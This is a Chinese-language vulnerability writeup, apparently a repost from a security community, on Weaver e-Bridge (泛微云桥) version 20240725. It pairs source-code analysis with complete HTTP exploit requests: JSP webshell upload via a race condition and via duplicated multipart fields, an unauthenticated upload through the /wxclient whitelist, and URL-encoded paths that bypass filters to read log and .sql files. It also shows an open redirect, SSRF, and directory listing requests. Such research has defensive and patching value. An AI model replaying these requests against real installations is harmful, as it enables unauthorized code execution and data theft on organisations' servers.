文章作者:先知社区(tj)
文章来源:https://xz.aliyun.com/news/17624
下载地址:https://wx.weaver.com.cn/download
补丁2023:https://wx.weaver.com.cn/download/
补丁2024:https://wx.weaver.com.cn/download/security
先安装2023的补丁再安装2024的补丁,
泛微云桥版本:20240725
后台文件上传
更改上传路径
POST /main/base/sysInfo/save HTTP/1.1Host: 192.168.163.132:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://192.168.163.132:8088/main/base/sysInfo?c_menu=base_sysInfoContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 262Origin: http://192.168.163.132:8088Connection: closeCookie: EBRIDGE_JSESSIONID=C0FEACC216EBF0F900D4D4203264D92BPriority: u=1sysInfo.id=b3812de75d3e4765920ba4d9497c5744&sysInfo.sysouturl=http%3A%2F%2F192.168.91.133%3A8088&sysInfo.sysouterip=117.172.250.72&sysInfo.sysinnerurl=http%3A%2F%2F192.168.91.133%3A8088&sysInfo.filerealpath=C:ebridgetomcatwebappsROOT&sysInfo.upgrade_remind=1
然后利用条件竞争进行文件上传(多线程在同一时间发包),以下两个接口均存在漏洞,
/main/portal/uploadCoverOrBanner?fileElementId=ccc
/main/wxpublic/message/saveImageMsgFodders,
POST /main/portal/uploadCoverOrBanner?fileElementId=bannerFileHost: 192.168.163.132:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://192.168.163.132:8088/main/portal?c_menu=portalX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------344527009441727570493099554103Content-Length: 231Origin: http://192.168.163.132:8088Connection: closeCookie: EBRIDGE_JSESSIONID=C0FEACC216EBF0F900D4D4203264D92B-----------------------------344527009441727570493099554103Content-Disposition: form-data; name="bannerFile"; filename="111.jsp"Content-Type: image/jpeg<%= 111 %>-----------------------------344527009441727570493099554103--
或者直接使用以下数据包发包,发送两个file文件,name相同覆盖了前一个file,此时循环就会循环一次,只删除了一个文件,还剩下一个文件没有删除,就可以上传成功,
POST /main/wxpublic/message/saveImageMsgFodders?fileElementId=cccHost: 192.168.163.132:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://192.168.163.132:8088/main/portal?c_menu=portalX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------344527009441727570493099554103Content-Length: 374Origin: http://192.168.163.132:8088Connection: closeCookie: EBRIDGE_JSESSIONID=C0FEACC216EBF0F900D4D4203264D92B-----------------------------344527009441727570493099554103Content-Disposition: form-data; name="bannerFile"; filename="111.jsp"Content-Type: image/jpeg<%= 111 %>-----------------------------344527009441727570493099554103Content-Disposition: form-data; name="bannerFile";filename="111.jsp"Content-Type: image/jpeg0222-----------------------------344527009441727570493099554103--
访问http://192.168.163.132:8088/202502/IE/111.js%70,jsp脚本执行成功
GET /202502/IE/111.js%70 HTTP/1.1Host: 192.168.163.132:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://192.168.163.132:8088/mainConnection: closeCookie: EBRIDGE_JSESSIONID=C0FEACC216EBF0F900D4D4203264D92BPriority: u=2
后台文件上传漏洞分析
入口函数
uploadPtCover/saveImageMsgFodders/uploadCoverOrBanner/importUser/save/uploadImage,
从这里到后面的MultipartRequest函数都是获取request请求的数据,
MultipartRequest函数就开始处理传输的文件,然后利用writeTo函数写入到文件中,
然后返回到MultipartRequest函数中,接着利用isSafe函数检查文件是否为jsp或者为php后缀,如果是的话就删除,(可以看到MultipartRequest函数和isSafeFile函数之间获取了multipartRequest中的文件名和类型)
因此getWxBaseFile函数的功能就是先接收上传内容保存到服务器,然后再从request中获取文件名和文件类型,再判断文件是否合法,不合法则删除,
绕过方法就可以利用条件竞争,
或者发送两个file文件,name相同覆盖了前一个file,此时循环就会循环一次,只删除了一个文件,还剩下一个文件没有删除,绕过成功,
最后如果正常访问的话会失败,因此我们需要分析一波咋回事(这里分析写在后面的分析认证逻辑部分),
http://192.168.163.132:8088/202502/IE/111.jsp
分析认证逻辑
web.xml配置了com.jfinal.core.JFinalFilter,前几个filter都是没有关于验证权限的,这里就使用的是JFinalFilter来验证的权限,
WxJFinalConfig继承了JFinalConfig,其中函数的含义如下,大概就是配置url、处理器、拦截器配置
configConstant(Constants me)配置常量,如开发模式、JSON 设置configRoute(Routes me)配置 URL 路由,如 /hello -> HelloControllerconfigPlugin(Plugins me)配置插件,如数据库连接池(C3p0, Druid)configInterceptor(Interceptors me)配置全局拦截器(权限、日志)configHandler(Handlers me)配置全局处理器(跨域、URL 重写)configEngine(Engine me)配置 JFinal 模板引擎
其中值得注意的地方:配置处理器和添加了几个拦截器
首先分析处理器,这里添加了4个处理器,
me.add(new ContextPathHandler("contextPath"));me.add(new GlobalHandler());me.add(new OutSysProxyHandler());me.add(new DruidStatViewHandler("/druid", new WxDruidStatViewAuth()));
其中GlobalHandler和OutSysProxyHandler主要处理路由
OutSysProxyHandler会通过这几行蓝色语句判断怎么访问
其中的逻辑就是如果匹配到proxy.xml中的字段,就返回false
<view><pattern>*.jsp</pattern><pattern>/weaver/*</pattern><pattern>/mobile/plugin/*</pattern><pattern>/mobilemode/*</pattern></view>
如果匹配到以下字段,就返回true,因此这里可以使用url编码绕过的限制,因为这里使用request.getRequestURI()后并没有进行相应的过滤措施,
<excludes><pattern>/</pattern><pattern>/login.do</pattern><pattern>/*</pattern><pattern>/druid/*</pattern></excludes>
我们需要让isLocalRequest、sLocalResource返回true,才能调出这个if条件
因为进入了此条件,就会拦截返回/wxapi/erropage?errcode=
因此关于proxy.xml中的配置,我们全部都可以利用url编码进行绕过
当自定义处理器都执行完毕后,再通过jfinal的ActionHandler利用uri获取相关actionMapping实例
当所有处理器执行完毕后,会执行拦截器
me.add(new SessionInViewInterceptor());me.add(new GlobalInterceptor());me.add(new IocInterceptor());me.add(new ShiroInterceptor());me.add(new TempAccountViewLogInterceptor());me.add(new GestureCipherInterceptor());
其中GlobalInterceptor拦截器的主要功能是检测uri的路由权限
这里判断url是否为/file/fileNoLogin,或者开头是/wxapi、/wxjsapi、/wxclient、/wxthirdapi
如不都不是,那么就会进行权限验证,说明以上路径是不经过权限验证的
if (!ai.getActionKey().equals("/file/fileNoLogin") && !ai.getActionKey().startsWith("/wxapi") && !ai.getActionKey().startsWith("/wxjsapi") && !ai.getActionKey().startsWith("/" + wxjsapiurl) && !ai.getActionKey().startsWith("/wxclient")) {if (!ai.getActionKey().startsWith("/wxthirdapi")) {
还判断了访问的控制器或者其方法是否使用了ClearInterceptor注解,如果使用了,那么也会进入下个拦截器,达到绕过权限的目的,
权限认证总结:GlobalHandler处理器会拦截.log/.sql/.db后缀,可以利用url编码绕过,OutSysProxyHandler处理器分析路由,ActionHandler处理器判断uri如果存在.,就会跳过拦截器,uri如果不存在.,就会根据uri获取actionMapping实例,获取失败就404(虽然能利用uri编码绕过权限限制,但是这里是将uri与actionMapping实例的uri对比是否相同,如/wxapi/mobilelist!=/wxapi/mobilelis%73,因此虽然绕过了权限限制,但是服务找不到正确actionMapping实例了,就会报错404),之后开始执行拦截器,GlobalInterceptor拦截器会先判断uri的后面部分是否是有大小写字母或数字组成,然后根据uri判断是否需要权限认证,这里有白名单(url为/file/fileNoLogin,或者开头是/wxapi、/wxjsapi、/wxclient、/wxthirdapi),或者访问控制器的类/方法使用ClearInterceptor注解来绕过未授权访问日志、sql文件GlobalHandler中利用url编码绕过,能读ROOT下的log目录中的日志,还能读取.sql、.db文件
GET /log/weixin.lo%67.2025-02-08 HTTP/1.1Host: 192.168.163.132:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://192.168.163.132:8088/main/base/sysInfo?c_menu=base_sysInfoContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 262Origin: http://192.168.163.132:8088Connection: closeCookie: EBRIDGE_JSESSIONID=C0FEACC216EBF0F900D4D4203264Priority: u=1sysInfo.id=b3812de75d3e4765920ba4d9497c5744&sysInfo.sysouturl=http%3A%2F%2F192.168.91.133%3A8088&sysInfo.sysouterip=117.172.250.72&sysInfo.sysinnerurl=http%3A%2F%2F192.168.91.133%3A8088&sysInfo.filerealpath=C:ebridgetomcatwebappsROOT&sysInfo.upgrade_remind=1
GET /data/mysql/202005131808_wx_core_runtimemsg_insert.sq%6c HTTP/1.1Host: 192.168.163.132:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://192.168.163.132:8088/goModule.doConnection: closeCookie: EBRIDGE_JSESSIONID=F5BC87708397FB45B9C1C47921F4390Upgrade-Insecure-Requests: 1Priority: u=1
因为GlobalHandler中的target是直接获取的uri,可以利用url编码绕过
因为最后在ActionHandler中的handle会判断uri是否存在.,不存在才会执行到过滤器,这里访问日志或者sql文件都存在.,因此达到未授权访问文件功能
未授权文件上传
利用未授权访问白名单接口,url开头是/wxapi、/wxjsapi、/wxclient、/wxthirdapi,或者访问控制器的类/方法使用ClearInterceptor注解,
(注意需要看管理员设置的保存路径,如果不在web目录,就需要登录后台更改上传路径)
fileUploadForCowork/fileUpload接口,
调用到getFile函数,漏洞原理与上面的后台文件上传一样,只是这里可以利用已/wxclient开头的uri白名单达到权限认证绕过的目的(可以看上面的权限认证部分),
POST /wxclient/app/maw/fileUpload HTTP/1.1Host: 192.168.163.132:8088Upgrade-Insecure-Requests: 1Cookie: EBRIDGE_JSESSIONID=227Accept-Encoding: gzip, deflateReferer: http://192.168.163.132:8088/loginAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Priority: u=1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Content-Type: multipart/form-data; boundary=---------------------------16056193103380574858834537891Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0charset: utf-8Accept: */*Accept-Encoding: gzip, deflateContent-Length: 24737-----------------------------16056193103380574858834537891Content-Disposition: form-data; name="meetingFile"; filename="1.jsp"Content-Type: application/text<%=1111 %>-----------------------------16056193103380574858834537891Content-Disposition: form-data; name="meetingFile"; filename="1.jsp"Content-Type: application/text<%=1111 %>-----------------------------16056193103380574858834537891--
访问上传文件,命令执行成功
POST /202502/LU/1.js%70 HTTP/1.1Host: 192.168.163.132:8088Upgrade-Insecure-Requests: 1Cookie: EBRIDGE_JSESSIONID=22Accept-Encoding: gzip, deflateReferer: http://192.168.163.132:8088/loginAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Priority: u=1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
其他漏洞
前台,OutSysProxyHandler类,url跳转,
192.168.163.132:8088/goModule.do?uri=http://www.baidu.com
后台,ssrf,
GET /main/wxpublic/message/js/ueditor/loadUEController?action=catchimage&source%5b%5d=http://192.168.163.132:8088/favicon.aa HTTP/1.1Host: 192.168.163.132:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://192.168.163.132:8088/loginConnection: closeCookie: EBRIDGE_JSESSIONID=E67EFDBC2A5364BACC0E8BEB87D57446Upgrade-Insecure-Requests: 1Priority: u=1Content-Length: 2
后台,查看目录,
getDirectories(weaver.weixin.component.controller.DirectoryBroswerController) ,
GET /main/component/directoryBroswer/getDirectories?directory=C:/&checkedNodeId= HTTP/1.1Host: 192.168.163.132:8088Priority: u=1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateCookie: EBRIDGE_JSESSIONID=0574B385B96D501D41EEFD7103D79D33Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Upgrade-Insecure-Requests: 1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论